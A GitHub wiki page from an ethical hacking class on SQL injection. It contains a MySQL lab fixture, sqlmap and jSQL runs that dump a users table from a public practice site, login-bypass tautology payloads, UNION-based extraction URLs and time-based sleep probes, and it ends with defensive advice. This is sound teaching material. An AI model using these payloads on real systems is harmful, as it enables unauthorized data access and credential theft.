0.01 Class 10 SQL injection attack - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
-- Lab fixture for the SQL injection class: two five-column demo tables plus a handful of rows,
-- followed by the queries the class walks through one by one.
-- NOTE(review): the password column holds plain-text strings. That is tolerable only for a
-- throwaway lab fixture; a real schema stores a salted password hash, never the password itself.
-- The "(15)" after INT is a MySQL display width, not a value range, and no PRIMARY KEY or
-- NOT NULL constraint is declared, so duplicate and NULL ids would be accepted.
create table attackers(id INT(15), username VARCHAR(15), password VARCHAR(15), country VARCHAR(15), fruit VARCHAR(15));
create table defenders(id INT(15), username VARCHAR(15), password VARCHAR(15), country VARCHAR(15), fruit VARCHAR(15));
-- Seed rows. Every id in both tables is positive, which the id=-1 probes below depend on.
INSERT INTO attackers (id, username, password, country, fruit) VALUES (1234,'james','777','UK','apple');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (1,'john','johnnyboy','USA','kiwi');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (11,'jane','pa$$word','GER','avocado');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (8888,'jake','01011970','UK','lemon');
INSERT INTO attackers (id, username, password, country, fruit) VALUES (81,'jolene','beautifulworld','USA','chery');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (12,'alice','pass1','USA','banana');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (14,'bob','password1','USA','peach');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (12222,'david','password1','ITA','vanilla');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (522,'chris','chris1','AUS','orange');
INSERT INTO defenders (id, username, password, country, fruit) VALUES (101,'robert','robi','CAN','mango');
-- Baseline listings, ordered by id so the output is deterministic.
select * from attackers order by id;
select * from defenders order by id;
-- UNION needs the same number of columns on both sides (five here) and removes duplicate rows;
-- UNION ALL would keep them.
select * from attackers union select * from defenders;
-- A normal lookup: matches the single row with id 1 (john).
select * from attackers where id=1;
-- No row has a negative id, so this returns an empty result set ...
select * from attackers where id=-1;
-- ... but appending "or 1=1" makes the predicate always true and returns every row.
-- This is the tautology behind the "or 1=1" payloads later in the notes: an application that
-- builds its WHERE clause by string concatenation cannot distinguish this from a legitimate id,
-- which is why values must be bound as parameters (prepared statements) instead.
select * from attackers where id=-1 or 1=1;
-- ORDER BY with a positional reference sorts by the Nth column of the result set.
select * from attackers order by 1;
select * from attackers order by 1,2,3,4,5;
-- The table has only five columns, so ordinal 6 makes the server raise an error. A web page
-- that forwards such database errors to the browser leaks schema details; generic error pages
-- plus server-side logging of the real error are the defensive counterpart.
select * from attackers order by 6;
-- Appends server metadata to the result: version(), user() and database() return the server
-- version, the connected account and the current schema, and the literals 4 and 5 pad the
-- right-hand side to the five columns UNION ALL requires.
-- NOTE(review): "where id" with no comparison relies on MySQL/MariaDB treating a nonzero
-- integer as true -- confirm on the target version before relying on it in class.
select * from attackers where id union all select version(),user(),database(),4,5;
-- Writes the whole table to a file on the database server's own filesystem. This requires the
-- FILE privilege, is restricted by the secure_file_priv setting, and fails if the file already
-- exists. An application's database account should not hold FILE, and secure_file_priv should
-- be set, so that a statement like this cannot be reached through an injected parameter.
select * from attackers into outfile '/tmp/database.txt';
- https://dev.mysql.com/doc/refman/8.0/en/
- https://docs.oracle.com/en/database/oracle/oracle-database/index.html
- https://docs.microsoft.com/en-us/sql/sql-server/?view=sql-server-ver15
https://www.sqltutorial.org/sql-sample-database/
┌──(student㉿kalinew)-[~]
└─$ sudo -i
┌──(root㉿kalinew)-[~]
└─# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 41
Server version: 10.6.7-MariaDB-3 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
- One of the most popular open-source SQL databases
#
/*comment*/
-- (a blank space is required after the --)
;%00 (%00 is the null character)
` (backtick, i.e. reverse single quote)
---
- mysql (only available to privileged users)
- information_schema (only available from MySQL version 5 onward)
Get useful version information
- version()
- @@VERSION
- Lightweight
- Directly embedded in application code
- No client-server authentication is required
- good for lightweight applications such as mobile apps
- standalone
- single database file
- multi model DBMS
- popular choice for enterprise applications (**only one way to insert comments: `--`**)
- Default databases: SYSTEM and SYSAUX
- No. 1 choice for Windows-based systems
- supports @@VERSION
/*comment*/
--
%00
pubs
model
msdb
tempdb
northwind
information_schema
- Network databases -> connected nodes
- Graph based database -> based on connections
- Object oriented database -> data as objects
- Document based -> data stored as documents containing key-value (KV) pairs
SELECT
WHERE
DISTINCT
ORDER BY
INSERT INTO
CREATE TABLE
ALTER DATABASE
DROP DATABASE
- Can be exploited via web
- Malicious code is inserted
- data exfiltration
- The single quote (') or the double quote ("): used as a delimiter for text values within queries
- (;) : used to separate different commands
- `--` : comments out the rest of the line, rendering the next part of a SQL query useless
- Error Based - server provides error messages
- Union Based - union based commands
- Boolean based (True and False queries)
- Time based (Time Delay Query)
TEST website: http://www.vulnweb.com/
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
[19:56:36] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
Database: acuart
Table: users
[1 entry]
+-------+
| uname |
+-------+
| test |
+-------+
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname,pass --dump
Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test | test |
+-------+------+
- sudo apt-get install jsql
[20:14:33,622] jSQL Injection v0.85 on Java 11.0.14.1-amd64-en
[20:14:34,614] [New release v0.85] Various internal improvements, Run now on latest Java 17
[20:14:34,614] [Ongoing] Experiment with Kerberos, Websocket, GraphQL, Kubernetes and DNS
[20:14:34,614] [Roadmap] More tampers, DNS/HTTP Out of band, WAF fingerprint
[20:16:03,958] Starting new injection: http://testphp.vulnweb.com/artists.php?artist=-1
[20:16:03,981] Connection test...
[20:16:04,239] Found status HTTP 200 Success
[20:16:04,254] Found 1 ignored <form> in HTML body:
<form action="search.php?test=query" method="post" />
<input name="searchFor" value="" />
<input name="goButton" value="go" />
[20:16:04,278] Fingerprinting database...
[20:16:04,530] Basic fingerprint matching vendor [MySQL]
[20:16:04,539] Using [MySQL]
[20:16:04,548] Fingerprinting character insertion with Boolean match...
[20:16:05,357] Found character insertion [0221011001] using Boolean match
[20:16:05,444] Fingerprinting database and character insertion with Order by match...
[20:16:05,841] Using [MySQL] and [0221011001]
[20:16:05,851] Add manually the character * like [-1*] to force the value [-1]
[20:16:05,851] Checking strategy Time with AND...
[20:16:06,230] Checking strategy Time with OR...
[20:16:21,271] Error during connection: request timed out
[20:16:21,292] Error during connection: request timed out
[20:16:21,292] Error during connection: request timed out
[20:16:21,298] Error during connection: request timed out
[20:16:21,299] Error during connection: request timed out
[20:16:21,300] Error during connection: request timed out
[20:16:21,677] Vulnerable to Time injection with OR
[20:16:21,677] Checking strategy Blind with AND...
[20:16:22,469] Checking strategy Blind with OR...
[20:16:23,256] Vulnerable to Blind injection with OR
[20:16:23,261] Checking strategy Error...
[20:16:27,232] Checking strategy Normal...
[20:16:27,785] Normal strategy triggered with query [union select 1,2,3]
[20:16:28,339] Vulnerable to Normal injection at index [1] using [65537] characters
[20:16:28,343] Using strategy [Normal]
[20:16:28,347] Fetching metadata...
[20:16:28,544] Database [acuart] on MySQL [8.0.22-0ubuntu0.20.04.2] for user [acuart@localhost]
[20:16:28,553] Fetching databases...
[20:16:28,939] Done
- sudo apt-get install sqlsus
sql -g attack
vi attack
update url_start our $url_start = "http://testphp.vulnweb.com/artists.php?artist=1";
- Asking True and False queries https://brightsec.com/blog/sql-injection-attack/
or 1=1
or 1=1--
or 1=1#
or 1=1/*
or 1=`1
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1#
http://testphp.vulnweb.com/login.php ' or 1='1
- Errors reported by database
- database structure
- site:http://testphp.vulnweb.com php?id=
http://testphp.vulnweb.com/artists.php?artist=1%27
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
- which one does not return an error?
http://testphp.vulnweb.com/artists.php?artist=1 order by 6--
http://testphp.vulnweb.com/artists.php?artist=1 order by 5--
http://testphp.vulnweb.com/artists.php?artist=1 order by 4--
http://testphp.vulnweb.com/artists.php?artist=1 order by 3--
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3--
**http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3--**
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),3--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,version()--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,database()--
acuart
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
artists,carts,categ,featured,guestbook,pictures,products,users
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"--
address,cart,cc,email,name,pass,phone,uname
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(uname) from users--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(pass) from users--
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(uname, 0x3a,pass) from users--
test
test
- login to website! with test/test
- part of blind injection attack
- prepare time delay query such as sleep, wait for delay etc
http://testphp.vulnweb.com/artists.php?artist=1-sleep(15)
http://testphp.vulnweb.com/artists.php?artist=1 and sleep(5)
- No special characters accepted in user-supplied query input
- No suspicious commands (only authorized commands; the application's database account should run with the least privilege it needs)
- Sanitize user inputs, and pass values through parameterized queries (prepared statements) rather than concatenating them into the SQL string